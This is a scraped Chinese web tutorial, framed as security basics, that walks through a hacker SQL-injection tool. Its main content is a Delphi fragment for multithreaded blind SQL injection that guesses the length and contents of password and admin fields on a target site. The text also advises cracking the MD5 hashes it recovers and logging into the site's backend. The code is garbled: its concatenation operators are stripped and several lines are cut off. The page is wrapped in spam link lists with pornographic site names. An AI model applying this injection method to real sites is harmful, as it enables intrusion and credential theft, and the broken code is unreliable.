六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

黑客的腳本漏洞工具區(qū)分(圖)

發(fā)表時(shí)間:2023-07-31 來源:明輝站整理相關(guān)軟件相關(guān)文章人氣:

[摘要]上圖只是對(duì)一個(gè)網(wǎng)站注入點(diǎn)的工具檢測(cè),當(dāng)然看到了結(jié)果掃出來的密碼為16位的md5加密碼,但我們可以通過md5密碼破解工具進(jìn)行破解的。然后找 到后臺(tái)用所得的用戶名和密碼進(jìn)行登錄即可。對(duì)于黑客軟件,其實(shí)并...

黑客的腳本漏洞工具分析(圖)1
上圖只是對(duì)一個(gè)網(wǎng)站注入點(diǎn)的工具檢測(cè),當(dāng)然看到了結(jié)果掃出來的密碼為16位的md5加密碼,但我們可以通過md5密碼破解工具進(jìn)行破解的。然后找 到后臺(tái)用所得的用戶名和密碼進(jìn)行登錄即可。對(duì)于黑客軟件,其實(shí)并不是我們想象的那么復(fù)雜,只是根據(jù)掌握的漏洞信息提交相應(yīng)該的數(shù)據(jù)罷了,我們看下下面一段 用delphi寫的注入的片段就清楚不過了。這里控件的設(shè)置和線程的創(chuàng)建略,我們主要是看看猜解的過程,如下:
procedure TMainForm.GuessContProc(ListInt: integer); { SQL注入 - 多線程猜解字段內(nèi)容 }
function SQLTextFunc(URl, TopStr, TableName, FieldName, LevelStr: string; Len: integer): string;
begin
Result := Url ’ and exists(select * from ’ TableName ’ where len(’ FieldName ’)’ LevelStr IntToStr(Len) ’ and id=(Select max(id) From ’ TableName ’ where id in (select top ’ TOPStr ’ id from ’ TableName ’ Order by id)))’
end;
var
TableName: string;
FieldName, S: string;
ContentInt: integer;
i, Len, LengthInt, N: integer;
GridCount: integer;
Colu: TColumn;
FlagBool: boolean;
begin
Len := 0;
LengthInt := 0;
FlagBool := True;
TableName := TableNameLst.Items[TableNameLst.Itemindex];
FieldName := Memo2.Lines[ListInt];
if (LowerCase(FieldName) = ’password’) or (LowerCase(FieldName) = ’pass’) or
(LowerCase(FieldName) = ’admin_pass’) or (FieldName = ’密碼’) or
(LowerCase(FieldName) = ’userpassword’) or (LowerCase(FieldName) = ’passwd’) then
begin
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, 16), 800);
if ContentInt >= and1Num then
begin
SqlResultMemo.Lines.Add(FieldName ’長度: 16’);
LengthInt := 16
end
else
begin
while (Len
begin
application.ProcessMessages;
inc(Len, 2);
Pane1.Caption := ’正在檢測(cè)長度:Len(’ FieldName ’)=’ inttostr(Len);
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’
if ContentInt >= and1Num then
begin
for N := Len - 1 to Len do
begin
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, N), 800);
if ContentInt >= and1Num then
begin
LengthInt := N;
SqlResultMemo.Lines.Add(FieldName ’長度: ’ inttostr(N));
FlagBool := False;
Break;
end; // if
end; // for
end; // if
end; // while
end;
end
else
begin
while (Len
begin
application.ProcessMessages;
inc(Len, 2);
Pane1.Caption := ’正在檢測(cè)長度:Len(’ FieldName ’)=’ inttostr(Len);
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’
if ContentInt >= and1Num then
begin
for N := Len - 1 to Len do
begin
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, N), 800);
if ContentInt >= and1Num then
begin
LengthInt := N;
SqlResultMemo.Lines.Add(FieldName ’長度: ’ inttostr(N));
FlagBool := False;
Break;
end; // if
end; // for
end; // if
end; // while
end;
GuessLsv.Clear;
if Len >= 50 then
begin
sql_EdUrl.Enabled := True;
Sql_GuessTable.Enabled := True;
TableNameLst.Enabled := True;
FieldNameLst.Enabled := True;
application.MessageBox(’列名長度大于50,猜解失敗!’, ’提示’, 32);
Exit;
end;
Pane1.Caption := ’正在檢測(cè)’ FieldName ’的內(nèi)容...’;
GuessLsv.Update;
if LengthInt = 5 then
begin
ContentInt := Get_HttpSize(Sql_EdUrl.Text ’ and exists (select top ’ sqlEdTop.Text ’ ’ FieldName ’ from ’ TableName ’ where instr(’ FieldName ’,’’admin’’)=1 and len(username)=5)’);
if ContentInt >= and1Num then
begin
s := ’admin’;
for i := 1 to 5 do
begin
application.ProcessMessages;
with GuessLsv.Items.Add do
begin
caption := ’第’ inttostr(i) ’位’;
SubItems.Add(s);
end;
sleep(60);
GuessLsv.Update;
end;
inc(SQL_ScanContent_ThreadCreateCount);
StringGrid1.Cells[SQL_ScanContent_ThreadCreateCount - 1, 1] := ’admin’;
StringGrid1.Cells[SQL_ScanContent_ThreadCreateCount, 1] := ’檢測(cè)中...’;
SqlResultMemo.Lines.Add(FieldNameLst.Items[FieldNameLst.Itemindex] ’內(nèi)容:admin’);
if SQL_ScanContent_ThreadCreateCount
GuessContProc(SQL_ScanContent_ThreadCreateCount - 1);
Exit;
end
else
begin
for i := 1 to LengthInt do
begin
application.ProcessMessages;
with GuessLsv.Items.Add do
begin
caption := ’第’ inttostr(i) ’位’;
SubItems.Add(’檢測(cè)中’);
end;
sleep(30);
end;
end;
end
else
begin
for i := 1 to LengthInt do
begin
application.ProcessMessages;
with GuessLsv.Items.Add do
begin
caption := ’第’ inttostr(i) ’位’;
SubItems.Add(’檢測(cè)中’);
end;
sleep(30);
end;
end;
從上面的代碼中,我們可以看出,黑客軟件只是代替了手工操作,通過多線程更進(jìn)一步提高了猜解的速度,但猜解的表和字段還得我們自己設(shè)定,然后通過 post提交我們?cè)O(shè)定的格式(其中url中的 是空格的意思,因?yàn)樵诰W(wǎng)址后面執(zhí)行相應(yīng)的sql語句時(shí)都要有相應(yīng)的空格),按照我們?cè)O(shè)定的表和字段猜解出相應(yīng)的用戶名和密碼內(nèi)容。


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。
主站蜘蛛池模板: 天天躁夜夜躁狠狠躁躁 | 日日日天天射天天干视频 | 亚洲成年男人的天堂网 | 青草悠悠视频在线观看 | 四虎影院在线免费观看 | 视频在线亚洲 | 亚洲丁香网 | 中日韩在线视频 | 日本在线观看视频 | 日本不卡一区二区三区在线观看 | 日韩 欧美 综合 | 欧美一级精品 | 最新欧美一级视频 | 青青青免费高清在线观看视频在线 | 一级做a爰片久久毛片毛片 一级做a爰片久久毛片看看 | 欧美视频中文字幕 | 青青青手机视频 | 午夜国产福利在线观看 | 综合九九| 日本五级床片在线观看 | 午夜激情视频在线观看 | 午夜视频免费 成人 | 日本不卡免费新一二三区 | 日本免费看片在线播放 | 亚洲爱色| 夜夜夜网站 | 日韩一卡 二卡 三卡 四卡 免费视频 | 午夜性刺激免费视频观看不卡专区 | 亚洲第成色999久久网站 | 三级视频在线观看 | 永久免费在线看mv | 亚洲图片欧美另类 | 天堂一码二码专区 | 青草免费免费观看视频在线 | 视频一区中文字幕 | 手机看片福利盒子久久 | 天堂网最新 | 日韩一级特黄 | 亚洲狠狠成人综合网 | 天天色天天看 | 四月激情网 |